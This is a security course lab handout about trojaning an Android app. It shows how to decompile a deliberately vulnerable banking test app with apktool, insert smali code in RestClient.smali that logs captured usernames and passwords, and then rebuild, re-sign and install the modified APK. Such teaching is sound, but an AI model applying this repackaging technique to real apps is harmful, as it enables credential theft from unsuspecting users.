Project 9: Decompiling and Trojaning an Android App with Smali Code (15 points)

Don't Be Evil

This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments!

Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project

Purpose

We'll take an Android app and modify it to steal passwords.

This version just puts the passwords in the log, which is easy but not very dangerous.

A later project will post the stolen passwords on the Internet, which is a lot scarier.

Signing an APK File

First, we'll make a signed APK file. This is a good thing to know how to do, to make your apps distributable to others. We need to do this now to create a signing certificate.

Android Studio should have a project open, such as "AndroidLabs-Base-Sam" or your "Hello World" app. If it does not, load one of those projects.

In Android Studio, click Build, "Create Signed APK...".

In the "Module" box, accept the default selection of app and click Next.

The next box asks for a "Key store path" box, as shown below.

Click the "Create new..." button.

Note for Windows Users

On Windows, you must type in the complete path, including the filename and extension, such as
c:\Users\Student\Desktop\p9\p9cert.jks
The "browse" button is useless on Windows.

Fill in the next box with any values you like, but put your real name in the "First and Last Name" field, as shown below.

Warning: don't put a comma in any of the fields or it will stop with a java error message.

Click OK.

Make a note of these items--you will need them later:
  • Key store path
  • alias
  • Key store password

The next box will automatically fill out itself, as shown below.

Click Next.

In the next box, click Finish, as shown below

A box pops up, saying "Signed APK's generated successfully", as shown below.

Downloading the "EMM - Vulnerable" App

This is a signed APK version of the same app we've been using for many projects.

On your computer, download the app from this link:

https://samsclass.info/128/proj/app-release.apk

Save the file somewhere you can find it, such as the Downloads folder.

Disassembling an APK with apktool

Go to

https://bitbucket.org/iBotPeaches/apktool/downloads

Download the latest version. When I did it on 2-1-15, it was "apktool_2.0.0rc3.jar".

Save the file in the same folder you used for the APK file, such as Downloads.

Open a Command Prompt or Terminal.

Change directory to the location you placed the downloaded file and open it with java, as shown below.

cd Downloads

java -jar apktool_2.0.0rc3.jar d app-release.apk

Messages appear as apktool disassembles the app, as shown below.

Click Next.

Viewing Smali Code

Open Finder or Windows Explorer and navigate to your Downloads folder.

Open this series of folders:

There are several smali files in there, as shown below.

Open RestClient.smali in a text editor.

You see the smali code.

Scroll down, or search for "performLogin(", to find the code shown below.

This is the assembly code used by dalvik, Android's Java VM implementation.

It's easy to see where the username and password are, as outlined in green above.

Comparing Java to Smali

The figure below shows the source code for the performLogin method in Java (as seen in Android Studio).

The statements outlined in green put the username and password into parameters.

Adding the Trojan Code

In file RestClient.smali, after the ".line 258" line, insert this code.

replace "YOURNAME" with your own name.

# EVIL TROJAN CODE LOGGING PASSWORD
const-string v0, "YOURNAME"
const-string v1, "USERNAME AND PASSWORD BELOW"
invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# END OF EVIL TROJAN CODE
Your screen should look like this:

Save the RestClient.smali file.

Building the App

Now we need to rebuild the APK file from the modified smali code.

In a Terminal or Command Prompt, execute this command:

java -jar apktool_2.0.0rc3.jar b app-release

Re-Signing the APK

Since the code has changed, the old signature is invalid. We must sign it again.

To do that, we'll use the "jarsigner" tool, part of the Jave Development Kit.

In a Terminal or Command Prompt, execute this command.

You will have to adjust the path after "-keystore" match the location of your signing certificate.

The last parameter is your key's Alias.

jarsigner -verbose -keystore ~/Box\ Sync/website/128/proj/p9cert.jks app-release/dist/app-release.apk proj9key
When you are prompted to, enter the key store password you chose earlier.

Troubleshooting

If you see "jarsigner not found", you are probably using Windows. The Java installer does not work and you need to set two environment variables manually.

Click Start, Computer.

Navigate to C:\Program Files\java and find out the full path to your jdk folder.

It will be something like C:\Program Files\Java\jdk1.6.0_02.

Now execute this command at an Administrator command prompt, with the correct jdk version:

set JAVA_HOME="C:\Program Files\Java\jdk1.7.0_75"
You also need to add this path to the PATH environment variable.

To do that, click Start, right-click Computer, click Properties, "Advanced System Settings", "Environment Variables".

Ensure that PATH is selected, and click Edit....

At the end of the path, insert this line, with the correct jdk version:

C:\Program Files\Java\jdk1.7.0_75\bin
Then log out and log in again.

Uninstalling the Old App

On your Android device, from the Home page, click the circle.

On the APPS tab, click Settings. Click Apps. Click "EMM - Vulnerable". Click Uninstall. Click OK.

Emailing the APK

Email the APK to the Gmail account your Android device is using.

On your Android device, click the circle and open the Gmail app.

Open your email, as shown below.

Installing the Trojaned App

Click on the attachment.

Click Install.

Click Open.

Starting the Server

You should have the server software for this app from the earlier projects.

If you are on a Mac, execute these commands, adjusting the path in the first command to the correct path for your machine:

cd /Users/sambowne/Downloads/LabServer-master

python app.py

If you are using Windows, execute these commands, adjusting the path in the first command to the correct path for your machine:
cd c:\Users\student\Downloads\LabServer-master\LabServer-master

app.py

You should see the message: "Serving HTTP on port 8080", as shown below.

Leave this window open.

Adjusting the Server IP Address

In Android, in the "EMM - Vulnerable" app, on the lower right corner, click the three-dot icon.

Click Reset.

Click the three-dot icon again.

Click Preferences.

Click "Bank Service Address".

Adjust the address to match the real IP address of your computer, as shown below.

(To get that address, run IPCONFIG or ifconfig.)

Click OK.

Opening Android Device Monitor

In Android Studio, click Tools, Android, "Android Device Monitor".

In the lower pane of Android Device Monitor, click the LogCat tab.

Logging In

In the Android app, at the lower left, click the curved back-arrow icon.

Log in as jdoe with a password of password.

In Android Device Monitor, find the red log entries with your name on them, as shown below.

Saving a Screen Image

Make sure these three items are visible: Save a full-desktop image of this screen. On a Mac, press Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the image with the filename "YOUR NAME Proj 9", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to cnit.128sam@gmail.com with the subject line: Proj 9 from YOUR NAME

Sources

How to unpack / pack an APK file

Dancing with dalvik

ExploitMe Mobile Android Labs


Last modified 3-3-15 6:57 am